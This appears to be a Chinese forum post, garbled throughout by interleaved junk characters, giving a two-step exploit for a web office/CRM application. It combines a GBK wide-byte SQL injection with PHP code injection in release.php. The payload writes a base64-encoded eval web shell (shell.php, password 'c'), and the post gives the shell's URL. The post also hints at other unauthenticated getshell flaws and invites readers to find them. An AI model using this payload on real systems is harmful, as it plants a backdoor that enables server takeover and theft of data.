此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.2 H e7 | J! N# `+ s- n+ Y
% u' Z- {2 W1 t5 f, q" u
1 N/ ]2 L; b2 H( `! U/ ?- uEXP:
6 {. B( Z8 s+ U5 y/ ]# P
2 h9 v7 S' w7 \ q7 @: R第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}7 {$ }4 F- z6 M' Z- G4 T4 C
/ c: r& b1 X" `' q
第二步: [GET]http://site/general/email/index.php
& P" Q- d7 y5 x* L' V9 _* I3 g# x 7 C8 }1 c9 T( i) ?4 f- p- b' Y' M
SHELL: http://site/general/email/shell.php 密码C3 T2 R8 d; i6 \7 i2 ?* ^
& X8 t9 F, C$ E* z5 \0 E$ C 9 ^1 V/ v' N; b7 S
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
% @8 `3 f$ Y" @ ]6 b# D, x 9 S& ?" ^7 s5 m( e4 u3 H
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~: Z" C: T5 O0 ~" v
! g& J) z- }- n y7 r' e& d2 I8 Q. I
|